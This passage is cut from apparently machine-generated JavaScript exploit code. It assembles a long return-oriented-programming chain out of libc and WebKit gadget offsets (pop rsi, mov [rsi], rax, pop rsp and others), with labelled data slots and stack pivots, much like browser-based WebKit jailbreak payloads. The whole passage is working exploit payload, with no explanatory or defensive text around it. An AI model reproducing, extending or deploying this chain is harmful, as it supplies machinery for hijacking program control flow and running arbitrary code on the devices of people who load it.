; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+500912, //L10909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10908: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10909: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10910: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+501008, //L10911 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10911: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10913: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+501128, //L10916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+501112, //L10914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10914: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10916: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+501272, //L10919 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+501240, //L10917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+501256, //L10918 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10917: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10918: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10919: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+501360, //L10921 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L10920: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L10921: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+501416, //L10922 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10922: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10924: db([4294967272, 4294967295]); // -0x18 set_gadgets([ 
libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+501496, //L10926 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10926: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+501608, //L10927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10927: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10929: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+501728, //L10932 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+501712, //L10930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10930: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10932: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+501872, //L10935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+501840, //L10933 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+501856, //L10934 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10933: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10934: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10935: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+501952, //L10936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L10936: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10937: db([32, 0]); // 0x20 set_gadget(libc_base+144605,); //pop rdi //L10938: db([32, 0]); // 0x20 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+502080, //L10940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+502064, //L10939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10939: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10940: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+502160, //L10941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10941: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10943: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+502280, //L10946 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+502264, //L10944 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10944: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10946: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+502360, //L10948 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+502392, //L10950 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10948: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L10949: ropchain+502520, //L10947 libc_base+144605 //pop rdi ]); //L10950: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+502496, //L10952 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+502512, //L10951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L10952: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L10951: db([0, 0]); // 0x0 //L10947: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+502584, //L10953 //L10896: libc_base+782311, //pop rsp ropchain+502600, //L10954 //L10953: libc_base+782311, //pop rsp ropchain+498576, //L10852 //L10954: //L10846: libc_base+764760, //pop rsi ropchain+502640, //L10955 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10955: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10957: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+502760, //L10960 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+502744, //L10958 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10958: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10960: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+502904, //L10963 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+502872, //L10961 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+502888, //L10962 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10961: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10962: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10963: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+502992, //L10965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L10964: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L10965: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+503048, //L10966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10966: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10968: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+503128, //L10970 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10970: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+548864, //L10599 //L8516: libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10971: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10973: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+503320, //L10976 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+503304, //L10974 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10974: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10976: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+503480, //L10980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+503432, //L10977 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+503448, //L10978 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10977: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10978: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10979: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L10980: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+503536, //L10981 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10981: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10983: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+503656, //L10984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+503672, //L10986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10984: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10986: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+503760, //L10987 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+503776, //L10989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10987: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10989: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10990: db([4294967208, 4294967295]); // -0x58 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10991: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10993: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+503952, //L10996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+503936, //L10994 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10994: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10996: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+504128, //L10999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+504144, //L11000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+504096, //L10997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+504112, //L10998 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10997: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10998: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10999: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11000: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd 
rax, edi libc_base+764760, //pop rsi ropchain+504304, //L11004 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+504272, //L11002 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+504288, //L11003 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11001: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11002: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11003: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11004: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+504440, //L11007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+504472, //L11009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+504424, //L11006 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11006: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11007: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11008: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11009: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+504584, //L11010+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+504576, //L11010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L11010: db([0, 0]); // 0x0 set_gadgets([ ropchain+504600, //L11010+24 ropchain+505240, //L11005 libc_base+764760, //pop rsi ropchain+504640, //L11011 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11011: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11013: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+504760, //L11016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+504744, //L11014 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11014: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11016: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+504936, //L11019 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+504952, //L11020 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+504904, //L11017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+504920, //L11018 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11017: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11018: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11019: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11020: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+505112, //L11024 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+505080, //L11022 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+505096, //L11023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11021: db([32, 0]); // 0x20 
set_gadget(webkit_base+3236123,); //pop r9 //L11022: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11023: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11024: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+505216, //L11027 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+505200, //L11026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11026: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11027: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+505592, //L11025 //L11005: libc_base+759608 //pop rax ]); //L11028: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L11029: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L11030: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+505472, //L11032 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+505488, //L11033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+505456, //L11031 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11031: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11032: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11033: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+505584, 
//L11035 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+505568, //L11034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11034: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11035: db([0, 0]); // 0x0 //L11025: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+505664, //L11036 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11036: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11038: db([4294967208, 4294967295]); // -0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+505784, //L11041 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+505768, //L11039 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11039: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11041: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+505928, //L11044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+505896, //L11042 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+505912, //L11043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11042: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11043: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11044: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov 
[rdi], rax libc_base+759608, //pop rax //L11046: ropchain+506032, //L11045 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+175384, //__strnlen_s //L11045: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+506104, //L11047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11047: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11049: db([4294967204, 4294967295]); // -0x5c set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L11051: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+506264, //L11054 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+506248, //L11052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11052: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11054: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+506440, //L11057 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+506456, //L11058 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+506408, //L11055 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+506424, //L11056 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11055: db([0, 
0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11056: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11057: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11058: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+506552, //L11060 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+506536, //L11059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11059: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11060: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L11061: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L11062: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L11063: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+506752, //L11065 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11065: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+506808, //L11066 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11066: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx 
